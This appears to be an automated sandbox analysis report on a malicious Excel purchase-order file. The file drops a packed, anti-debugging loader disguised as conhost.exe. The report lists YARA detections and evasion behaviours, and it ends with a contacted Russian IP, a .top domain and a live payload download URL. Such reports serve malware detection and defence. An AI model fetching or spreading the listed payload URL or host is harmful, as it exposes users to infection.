Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.expl.evad.winXLSM@3/10@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsm
Source: C:\ETTER\dAneDFma\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREF9B.tmp
Source: C:\ETTER\dAneDFma\conhost.exe Command line argument: n|D 3_2_00447BC0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\ETTER\dAneDFma\conhost.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044E69D push esi; ret 3_2_0044E6A6
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B3FE pushad ; retn 0044h 3_2_0044B41D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B4F6 push eax; ret 3_2_0044B50D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429588 push ecx; ret 3_2_0042959B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429DA6 push ecx; ret 3_2_00429DB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FA54D pushad ; iretd 3_2_002FA556
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FAFCA push cs; ret 3_2_002FB14C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005397D8 push ecx; ret 3_2_005397EB

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00428808
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D772 3_2_0040D772
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D46C GetSystemInfo, 3_2_0040D46C

Anti Debugging:

Checks if the current process is being debugged
Source: C:\ETTER\dAneDFma\conhost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037EA LdrInitializeThunk, 3_2_004037EA
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Contains functionality to read the PEB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043635F mov eax, dword ptr fs:[00000030h] 3_2_0043635F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040460E mov eax, dword ptr fs:[00000030h] 3_2_0040460E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037CB mov eax, dword ptr fs:[00000030h] 3_2_004037CB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8E8 mov eax, dword ptr fs:[00000030h] 3_2_0043D8E8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8A2 mov eax, dword ptr fs:[00000030h] 3_2_0043D8A2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D91B mov eax, dword ptr fs:[00000030h] 3_2_0043D91B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002F8EF3 push dword ptr fs:[00000030h] 3_2_002F8EF3
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005465AF mov eax, dword ptr fs:[00000030h] 3_2_005465AF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051485E mov eax, dword ptr fs:[00000030h] 3_2_0051485E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051092B mov eax, dword ptr fs:[00000030h] 3_2_0051092B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00510D90 mov eax, dword ptr fs:[00000030h] 3_2_00510D90
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00513A1B mov eax, dword ptr fs:[00000030h] 3_2_00513A1B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DAF2 mov eax, dword ptr fs:[00000030h] 3_2_0054DAF2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB6B mov eax, dword ptr fs:[00000030h] 3_2_0054DB6B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB38 mov eax, dword ptr fs:[00000030h] 3_2_0054DB38
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00440C62 GetProcessHeap, 3_2_00440C62
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429B5B SetUnhandledExceptionFilter, 3_2_00429B5B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429778 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00429778
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042DBDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0042DBDB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005399C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_005399C8

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429BB0 cpuid 3_2_00429BB0
Contains functionality to query locales information (e.g. system language)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_004426FE
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429EF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429A4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00442A8A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00442B15
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GlobalAlloc, 3_2_00442D6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00442E92
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0043AF87
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00442F9A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_0044306D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0043B4FA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_0055294E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552BF4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552C3F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552CDA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00552D65
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00552FBA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_005530E2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0054B1D7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_005531EA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_005532BD
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0054B74A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043B539 GetSystemTimeAsFileTime, 3_2_0043B539

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
193.106.175.25 | unknown | Russian Federation | 50465 | IQHOSTRU | true

Contacted Domains

Name IP Active
gvbmkhvnyib.top 193.106.175.25 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader | true | Virustotal: 7%; Avira URL Cloud: safe | unknown